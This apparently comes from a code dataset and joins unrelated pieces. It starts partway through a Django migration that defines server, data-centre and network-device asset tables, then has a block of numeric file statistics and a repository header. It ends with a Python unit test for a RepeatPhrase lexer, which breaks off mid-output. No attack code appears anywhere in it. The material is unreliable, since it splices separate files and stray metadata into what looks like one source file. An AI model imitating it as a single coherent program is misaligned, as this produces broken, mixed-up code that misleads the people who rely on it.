('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FlowUpdateLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(blank=True, max_length=255, verbose_name='\u53d8\u66f4\u5185\u5bb9')),
('updater', models.CharField(blank=True, max_length=50, verbose_name='\u64cd\u4f5c\u4eba')),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Host',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hostname', models.CharField(max_length=50, verbose_name='\u4e3b\u673a\u540d')),
('ip', models.GenericIPAddressField(null=True, verbose_name='\u7ba1\u7406IP')),
('other_ip', models.CharField(blank=True, max_length=100, verbose_name='\u5176\u5b83IP')),
('domain', models.CharField(blank=True, max_length=255, verbose_name='\u57df\u540d')),
('asset_no', models.CharField(blank=True, max_length=50, verbose_name='\u8d44\u4ea7\u7f16\u53f7')),
('asset_type', models.IntegerField(choices=[(1, '\u56fa\u8d44'), (2, '\u501f\u8d27'), (3, '\u4f9b\u5e94\u5546')], null=True, verbose_name='\u8bbe\u5907\u7c7b\u578b')),
('status', models.IntegerField(choices=[(-2, '\u5f85\u786e\u8ba4'), (-1, '\u79bb\u7ebf'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u8bbe\u5907\u72b6\u6001')),
('os', models.CharField(blank=True, max_length=100, verbose_name='\u64cd\u4f5c\u7cfb\u7edf')),
('vendor', models.CharField(blank=True, max_length=50, verbose_name='\u8bbe\u5907\u5382\u5546')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u8bbe\u5907\u578b\u53f7')),
('cpu_model', models.CharField(blank=True, max_length=100, verbose_name='CPU\u578b\u53f7')),
('cpu_num', models.CharField(blank=True, max_length=100, verbose_name='CPU\u6570\u91cf')),
('memory', models.CharField(blank=True, max_length=30, verbose_name='\u5185\u5b58\u5927\u5c0f')),
('disk', models.CharField(blank=True, max_length=255, verbose_name='\u786c\u76d8\u4fe1\u606f')),
('ssd', models.CharField(blank=True, max_length=255, verbose_name='SSD\u4fe1\u606f')),
('raid', models.CharField(blank=True, max_length=100, verbose_name='Raid\u5361')),
('sn', models.CharField(blank=True, max_length=60, verbose_name='SN\u53f7 \u7801')),
('sn_mac', models.CharField(blank=True, max_length=100, verbose_name='\u8bbe\u5907\u552f\u4e00\u7f16\u53f7')),
('bmc_address', models.CharField(blank=True, max_length=100, verbose_name='\u5e26\u5916\u7ba1\u7406')),
('nic', models.CharField(blank=True, max_length=100, verbose_name='\u7f51\u5361')),
('manage_nic_mac', models.CharField(blank=True, max_length=100, verbose_name='\u7ba1\u7406\u7f51\u5361Mac')),
('arrive_time', models.DateTimeField(blank=True, null=True)),
('order_no', models.CharField(blank=True, max_length=100, verbose_name='\u8ba2\u5355\u7f16\u53f7')),
('contract_no', models.CharField(blank=True, max_length=100, verbose_name='\u5408\u540c\u7f16\u53f7')),
('warranty_period', models.DateTimeField(blank=True, null=True)),
('power', models.CharField(blank=True, max_length=200, verbose_name='\u7535\u6e90')),
('floor', models.CharField(blank=True, max_length=100, verbose_name='\u697c\u5c42')),
('room', models.CharField(blank=True, max_length=100, verbose_name='\u623f\u95f4')),
('cabinet_col', models.CharField(blank=True, max_length=100, verbose_name='\u673a\u67dc\u5217')),
('cabinet_num', models.CharField(blank=True, max_length=100, verbose_name='\u673a\u67dc\u53f7')),
('position', models.CharField(blank=True, max_length=100, verbose_name='\u5177\u4f53U\u4f4d')),
('pod', models.CharField(blank=True, max_length=50, verbose_name='POD')),
('height', models.CharField(blank=True, max_length=100, verbose_name='\u8bbe\u5907\u9ad8\u5ea6')),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('is_wrong', models.BooleanField(default=False)),
('wrong_info', models.TextField(blank=True, max_length=255, verbose_name='\u5f02\u5e38\u5bf9\u6bd4')),
('is_confirmed', models.BooleanField(default=False)),
('role', models.CharField(blank=True, max_length=50, verbose_name='\u65f7\u89c6\u89d2\u8272')),
('kernel_version', models.CharField(blank=True, max_length=100, verbose_name='\u5185\u6838\u7248\u672c')),
('os_disk', models.CharField(blank=True, max_length=100, verbose_name='OS\u5185\u786c\u76d8')),
('usage_person', models.CharField(blank=True, max_length=100, verbose_name='\u4f7f\u7528\u4eba')),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Product', verbose_name='\u6240\u5c5e\u90e8\u95e8')),
],
),
migrations.CreateModel(
name='HostGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='\u670d\u52a1\u5668\u7ec4\u540d')),
('desc', models.CharField(blank=True, max_length=100, verbose_name='\u63cf\u8ff0')),
('serverList', models.ManyToManyField(blank=True, to='cmdb.Host', verbose_name='\u6240\u5728\u670d\u52a1\u5668')),
],
),
migrations.CreateModel(
name='Idc',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ids', models.CharField(max_length=255, unique=True, verbose_name='\u673a\u623f\u6807\u8bc6')),
('name', models.CharField(max_length=255, unique=True, verbose_name='\u673a\u623f\u540d\u79f0')),
('address', models.CharField(blank=True, max_length=100, verbose_name='\u673a\u623f\u5730\u5740')),
('tel', models.CharField(blank=True, max_length=30, verbose_name='\u673a\u623f\u7535\u8bdd')),
('contact', models.CharField(blank=True, max_length=30, verbose_name='\u5ba2\u6237\u7ecf\u7406')),
('contact_phone', models.CharField(blank=True, max_length=30, verbose_name='\u79fb\u52a8\u7535\u8bdd')),
('jigui', models.CharField(blank=True, max_length=30, verbose_name='\u673a\u67dc\u4fe1\u606f')),
('ip_range', models.CharField(blank=True, max_length=30, verbose_name='IP\u8303\u56f4')),
('bandwidth', models.CharField(blank=True, max_length=30, verbose_name='\u63a5\u5165\u5e26\u5bbd')),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('pdu_type', models.IntegerField(choices=[(1, '\u6b27\u6807'), (2, '\u56fd\u6807'), (3, 'C14-13 * 2')], null=True, verbose_name='PDU\u7c7b\u578b')),
('pdu_num', models.CharField(blank=True, max_length=100, verbose_name='\u63d2\u53e3\u6570\u91cf')),
('bear_media', models.IntegerField(choices=[(1, '\u89d2\u94c1'), (2, '\u6258\u76d8'), (3, '\u5176\u5b83')], null=True, verbose_name='\u627f\u91cd\u4ecb\u8d28')),
('bear_weight', models.CharField(blank=True, max_length=100, verbose_name='\u627f\u91cd\u516c\u65a4')),
('workday_response', models.CharField(blank=True, max_length=100, verbose_name='\u5de5\u4f5c\u65e5\u54cd\u5e94\u65f6\u95f4')),
('holiday_response', models.CharField(blank=True, max_length=100, verbose_name='\u8282\u5047\u65e5\u54cd\u5e94\u65f6\u95f4')),
('use_cabinet_num', models.CharField(blank=True, max_length=100, verbose_name='\u4f7f\u7528\u673a\u67dc\u603b\u6570')),
('free_cabinet_num', models.CharField(blank=True, max_length=100, verbose_name='\u7a7a\u95f2\u673a\u67dc\u603b\u6570')),
('maintain_service', models.CharField(blank=True, max_length=100, verbose_name='\u4ee3\u7ef4\u670d\u52a1\u5546')),
('maintain_contact', models.CharField(blank=True, max_length=100, verbose_name='\u4ee3\u7ef4\u8054\u7cfb\u65b9\u5f0f')),
('delivery_address', models.CharField(blank=True, max_length=100, verbose_name='\u6536\u8d27\u5730\u5740')),
('data_center', models.CharField(blank=True, max_length=100, verbose_name='\u6570\u636e\u4e2d\u5fc3\u4ed3\u5e93')),
('carrier', models.IntegerField(choices=[(1, '\u8054\u901a'), (2, '\u79fb\u52a8'), (3, '\u7535\u4fe1'), (4, 'BGP'), (5, '\u5176\u5b83')], null=True, verbose_name='\u8fd0\u8425\u5546\u540d\u79f0')),
('extra_service', models.CharField(blank=True, max_length=100, verbose_name='\u9644\u52a0\u670d\u52a1')),
('search_path', models.CharField(max_length=200, null=True, verbose_name='\u67e5\u8be2\u8def\u5f84')),
],
options={
'verbose_name': '\u6570\u636e\u4e2d\u5fc3',
'verbose_name_plural': '\u6570\u636e\u4e2d\u5fc3',
},
),
migrations.CreateModel(
name='InterFace',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('vendor', models.CharField(max_length=30, null=True)),
('bandwidth', models.CharField(max_length=30, null=True)),
('tel', models.CharField(max_length=30, null=True)),
('contact', models.CharField(max_length=30, null=True)),
('startdate', models.DateField()),
('enddate', models.DateField()),
('price', models.IntegerField(verbose_name='\u4ef7\u683c')),
],
),
migrations.CreateModel(
name='IpSource',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('net', models.CharField(max_length=30)),
('subnet', models.CharField(max_length=30, null=True)),
('describe', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='NetDevice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip', models.CharField(blank=True, max_length=100, verbose_name='\u7ba1\u7406IP')),
('sn', models.CharField(blank=True, max_length=60, verbose_name='SN\u53f7 \u7801')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u578b\u53f7')),
('device_type', models.CharField(blank=True, max_length=50, verbose_name='\u7c7b\u578b')),
('asset_type', models.IntegerField(choices=[(1, '\u56fa\u8d44'), (2, '\u501f\u8d27'), (3, '\u4f9b\u5e94\u5546')], null=True, verbose_name='\u8d44\u4ea7\u7c7b\u578b')),
('position', models.CharField(blank=True, max_length=100, verbose_name='\u673a\u67b6\u4f4d')),
('power', models.CharField(blank=True, max_length=200, verbose_name='\u7535\u6e90')),
('height', models.CharField(blank=True, max_length=100, verbose_name='\u8bbe\u5907\u9ad8\u5ea6')),
('os', models.CharField(blank=True, max_length=255, verbose_name='\u64cd\u4f5c\u7cfb\u7edf')),
('hostname', models.CharField(blank=True, max_length=50, verbose_name='\u4e3b\u673a\u540d')),
('port_num', models.CharField(blank=True, max_length=50, verbose_name='\u7aef\u53e3\u6570\u91cf')),
('vendor', models.CharField(blank=True, max_length=100, verbose_name='\u5382\u5546')),
('arch_type', models.CharField(blank=True, max_length=100, verbose_name='\u67b6\u6784\u7c7b\u578b')),
('usage', models.CharField(blank=True, max_length=100, verbose_name='\u7528\u9014')),
('sw_version', models.CharField(blank=True, max_length=100, verbose_name='\u8f6f\u4ef6\u7248\u672c\u53f7')),
('status', models.IntegerField(choices=[(-2, '\u5f85\u786e\u8ba4'), (-1, '\u79bb\u7ebf'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f'), (6, '\u5728\u7528(\u975e\u81ea\u52a8\u6293\u53d6)')], null=True, verbose_name='\u8bbe\u5907\u72b6\u6001')),
('arrive_time', models.DateTimeField(blank=True, null=True)),
('warranty_period', models.DateTimeField(blank=True, null=True)),
('order_no', models.CharField(blank=True, max_length=100, verbose_name='\u8ba2\u5355\u7f16\u53f7')),
('contract_no', models.CharField(blank=True, max_length=100, verbose_name='\u5408\u540c\u7f16\u53f7')),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('is_wrong', models.BooleanField(default=False)),
('wrong_info', models.TextField(blank=True, verbose_name='\u5f02\u5e38\u5bf9\u6bd4')),
('is_confirmed', models.BooleanField(default=False)),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Product', verbose_name='\u6240\u5c5e\u90e8\u95e8')),
('idc', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Idc', verbose_name='\u6240\u5728\u673a\u623f')),
('project', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Project', verbose_name='\u6240\u5c5e\u9879\u76ee')),
('supply', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Supply', verbose_name='\u6240\u5c5e\u4f9b\u5e94\u5546')),
],
),
migrations.CreateModel(
name='Usage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateTimeField(blank=True, null=True)),
('hw_type', models.CharField(blank=True, max_length=50, verbose_name='\u786c\u4ef6\u7c7b\u578b')),
('usage', models.TextField(blank=True, verbose_name='\u4f7f\u7528\u7387')),
('host', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668')),
],
),
migrations.CreateModel(
name='UserInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=100, null=True)),
('password', models.CharField(max_length=100, null=True)),
],
),
migrations.AddField(
model_name='host',
name='idc',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Idc', verbose_name='\u6240\u5728\u673a\u623f'),
),
migrations.AddField(
model_name='host',
name='project',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Project', verbose_name='\u6240\u5c5e\u9879\u76ee'),
),
migrations.AddField(
model_name='host',
name='supply',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Supply', verbose_name='\u6240\u5c5e\u4f9b\u5e94\u5546'),
),
migrations.AddField(
model_name='flowupdatelog',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u64cd\u4f5c\u673a\u5668'),
),
migrations.AddField(
model_name='fittingssd',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingssd',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingraid',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingraid',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingpower',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingpower',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingnic',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingnic',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingmod',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingmod',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingmemory',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingmemory',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittinggpu',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittinggpu',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingdisk',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingdisk',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fittingcard',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fittingcard',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='fitting',
name='device',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.NetDevice', verbose_name='\u6240\u5c5e\u7f51\u7edc\u8bbe\u5907'),
),
migrations.AddField(
model_name='fitting',
name='host',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Host', verbose_name='\u6240\u5c5e\u673a\u5668'),
),
migrations.AddField(
model_name='cabinet',
name='idc',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cmdb.Idc', verbose_name='\u6240\u5728\u673a\u623f'),
),
migrations.AddField(
model_name='cabinet',
name='serverList',
field=models.ManyToManyField(blank=True, to='cmdb.Host', verbose_name='\u6240\u5728\u670d\u52a1\u5668'),
),
]
| 75.486111
| 318
| 0.61557
| 4,964
| 43,480
| 5.246172
| 0.088437
| 0.087781
| 0.076031
| 0.114047
| 0.884187
| 0.87716
| 0.855119
| 0.835266
| 0.821519
| 0.761923
| 0
| 0.094982
| 0.214006
| 43,480
| 575
| 319
| 75.617391
| 0.667037
| 0.001564
| 0
| 0.677249
| 1
| 0
| 0.212974
| 0.081895
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.001764
| 0.005291
| 0
| 0.012346
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0fec75ddde5c75e14c62e8970adcf92447989b33
| 42,196
|
py
|
Python
|
src/TheLanguage/Lexer/Phrases/UnitTests/RepeatPhrase_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | null | null | null |
src/TheLanguage/Lexer/Phrases/UnitTests/RepeatPhrase_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | null | null | null |
src/TheLanguage/Lexer/Phrases/UnitTests/RepeatPhrase_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | 1
|
2021-06-18T18:58:57.000Z
|
2021-06-18T18:58:57.000Z
|
# ----------------------------------------------------------------------
# |
# | RepeatPhrase_UnitTest.py
# |
# | David Brownell <db@DavidBrownell.com>
# | 2021-09-24 14:30:09
# |
# ----------------------------------------------------------------------
# |
# | Copyright David Brownell 2021
# | Distributed under the Boost Software License, Version 1.0. See
# | accompanying file LICENSE_1_0.txt or copy at
# | http://www.boost.org/LICENSE_1_0.txt.
# |
# ----------------------------------------------------------------------
"""Unit test for RepeatPhrase.py"""
import os
import re
import textwrap
import pytest
import CommonEnvironment
from CommonEnvironmentEx.Package import InitRelativeImports
# ----------------------------------------------------------------------
_script_fullpath = CommonEnvironment.ThisFullpath()
_script_dir, _script_name = os.path.split(_script_fullpath)
# ----------------------------------------------------------------------
with InitRelativeImports():
from ..OrPhrase import OrPhrase
from ..RepeatPhrase import *
from ..TokenPhrase import (
NewlineToken,
RegexToken,
TokenPhrase,
)
from ...Components.Phrase import Phrase
from ...Components.UnitTests import (
CoroutineMock,
CreateIterator,
MethodCallsToString,
parse_mock,
)
# ----------------------------------------------------------------------
class TestStandard(object):
_word_phrase = TokenPhrase(RegexToken("Word", re.compile(r"(?P<value>[a-zA-Z]+)")))
_newline_phrase = TokenPhrase(NewlineToken())
_or_phrase = OrPhrase([_word_phrase, _newline_phrase])
_phrase = RepeatPhrase(_or_phrase, 2, 4)
_exact_phrase = RepeatPhrase(_or_phrase, 4, 4)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_MatchSingleLine(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
""",
),
),
parse_mock,
single_threaded=True,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[2, 1] (4)"
Success: True
""",
)
assert MethodCallsToString(parse_mock) == textwrap.dedent(
"""\
0) StartPhrase, "{(Word | Newline+), 2, 4}"
1) StartPhrase, "(Word | Newline+)"
2) StartPhrase, "Word"
3) OnInternalPhraseAsync, 0, 3
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
4) EndPhrase, "Word" [True]
5) StartPhrase, "Newline+"
6) EndPhrase, "Newline+" [False]
7) OnInternalPhraseAsync, 0, 3
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
8) EndPhrase, "(Word | Newline+)" [True]
9) StartPhrase, "(Word | Newline+)"
10) StartPhrase, "Word"
11) EndPhrase, "Word" [False]
12) StartPhrase, "Newline+"
13) OnInternalPhraseAsync, 3, 4
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
14) EndPhrase, "Newline+" [True]
15) OnInternalPhraseAsync, 3, 4
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
16) EndPhrase, "(Word | Newline+)" [True]
17) OnInternalPhraseAsync, 0, 4
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
18) EndPhrase, "{(Word | Newline+), 2, 4}" [True]
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_MatchTwoLines(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
